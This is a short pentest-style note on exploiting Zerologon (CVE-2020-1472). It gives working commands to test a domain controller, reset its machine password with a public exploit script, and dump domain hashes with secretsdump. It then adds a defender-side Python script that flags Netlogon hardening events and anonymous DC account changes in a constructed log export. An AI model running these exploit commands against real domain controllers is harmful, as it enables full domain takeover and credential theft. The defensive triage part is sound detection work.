<aside> 📌 Summary
</aside>
<aside> ⚠️ This exploit might destroy an environment, please use it carefully
</aside>
Zerologon (CVE-2020-1472) is a critical vulnerability in Microsoft's Netlogon protocol that allows attackers to bypass the authentication process for Windows domain controllers. Exploiting this vulnerability enables an attacker to impersonate the domain controller and gain administrative access to the entire network.
First we want to verify whether our target is vulnerable. To do so we can use the test script from https://github.com/SecuraBV/CVE-2020-1472:
python3 zerologon_tester.py ORB-DC 10.0.0.12
If our target is vulnerable, we can now use https://github.com/dirkjanm/CVE-2020-1472 to abuse the Netlogon protocol:
python3 cve-2020-1472-exploit.py ORB-DC 10.0.0.2

Then we can freely connect to the target without a password, as in this example. Here we use \$ to signal that there is no password:
secretsdump.py -just-dc ORB/ORB-DC\$@[email protected]
To restore the password we'll need the administrator hash as well as the plain_password_hex.
For the first one we can use the result of the previous command.
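From the defender's side, the steps above leave traces a domain controller's event logs can be searched for: the Netlogon hardening in Microsoft's August 2020 update (KB4557222) logs events 5827-5831 for secure-channel connections that enforcement mode would deny, and the exploit's reset of the DC machine-account password shows up as a computer-account change (event 4742) attributed to ANONYMOUS LOGON. The script below is an added example, not part of the original note and not code from the SecuraBV or dirkjanm repositories; it triages a constructed CSV event export (the column layout, the account names and the IP addresses are assumptions) and ranks the findings so the critical indicator is not buried under noise.

```python
"""Defender-side triage for Zerologon (CVE-2020-1472) indicators in Windows event exports.

This is an added example, not part of the original note and not code from the
SecuraBV or dirkjanm repositories. The event export below is constructed.
"""
import csv
import io
from collections import Counter
from dataclasses import dataclass

# Event IDs added to the System log by the Netlogon hardening in Microsoft's
# August 2020 update (documented in KB4557222).
NETLOGON_EVENTS = {
    5827: ("denied", "machine account over an insecure Netlogon channel"),
    5828: ("denied", "trust account over an insecure Netlogon channel"),
    5829: ("allowed", "machine account, initial deployment phase"),
    5830: ("allowed", "machine account, exempted by group policy"),
    5831: ("allowed", "trust account, exempted by group policy"),
}

COMPUTER_ACCOUNT_CHANGED = 4742     # Security log: "A computer account was changed"
ANONYMOUS_LOGON_SID = "S-1-5-7"     # well-known SID of ANONYMOUS LOGON


@dataclass(frozen=True)
class Finding:
    time: str
    event_id: int
    account: str
    source: str
    severity: str
    note: str


def parse_export(text):
    """Parse a constructed CSV export with columns time,event_id,account,subject_sid,client."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["event_id"] = int(row["event_id"])
        rows.append(row)
    return rows


def triage(rows, dc_accounts):
    """Return Findings for Netlogon hardening events and for changes to DC machine accounts.

    dc_accounts is the set of domain-controller computer account names (e.g. {"ORB-DC$"}).
    """
    findings = []
    for r in rows:
        eid = r["event_id"]
        if eid in NETLOGON_EVENTS:
            disposition, detail = NETLOGON_EVENTS[eid]
            # Connections still being allowed are the ones to fix before enforcement
            # mode (FullSecureChannelProtection=1) turns them into outages.
            severity = "high" if disposition == "allowed" else "medium"
            findings.append(Finding(r["time"], eid, r["account"], r["client"], severity,
                                    f"vulnerable Netlogon channel {disposition}: {detail}"))
        elif eid == COMPUTER_ACCOUNT_CHANGED and r["account"] in dc_accounts:
            if r["subject_sid"] == ANONYMOUS_LOGON_SID:
                # The exploit resets the DC's own machine-account password through
                # NetrServerPasswordSet2 without authenticating, so the change is
                # recorded against ANONYMOUS LOGON rather than the account itself.
                findings.append(Finding(r["time"], eid, r["account"], r["client"], "critical",
                                        "DC machine account changed by ANONYMOUS LOGON"))
            else:
                findings.append(Finding(r["time"], eid, r["account"], r["client"], "low",
                                        "DC machine account changed (routine rotation if the subject is the account itself)"))
    return findings


def severity_counts(findings):
    """Count findings per severity, for a one-line dashboard summary."""
    return dict(Counter(f.severity for f in findings))


# Constructed export: two lines from a legacy NAS that still uses an insecure
# channel, one anonymous change to the DC account (the exploit's footprint), one
# routine workstation account change and one unrelated logon event.
SAMPLE_EXPORT = """time,event_id,account,subject_sid,client
2020-09-15T10:01:02Z,5829,LEGACY-NAS$,,10.0.0.40
2020-09-15T10:02:10Z,5827,LEGACY-NAS$,,10.0.0.40
2020-09-15T10:05:44Z,4742,ORB-DC$,S-1-5-7,
2020-09-15T10:06:00Z,4742,WS01$,S-1-5-21-1004336348-1177238915-682003330-1105,
2020-09-15T10:07:00Z,4624,jdoe,S-1-5-21-1004336348-1177238915-682003330-1106,10.0.0.55
"""


def run_sample():
    """Triage the constructed export, treating ORB-DC$ as the only domain controller."""
    return triage(parse_export(SAMPLE_EXPORT), {"ORB-DC$"})


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.time} [{f.severity:8}] {f.event_id} {f.account:12} {f.source:10} {f.note}")
    print(severity_counts(run_sample()))
```

The routine 30-day rotation of a DC's machine-account password also produces a 4742, so the check keys on the subject being ANONYMOUS LOGON rather than on the event alone; on a real export, feed the script the actual DC account names and confirm the "allowed" Netlogon findings are remediated before switching the DCs to enforcement mode.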
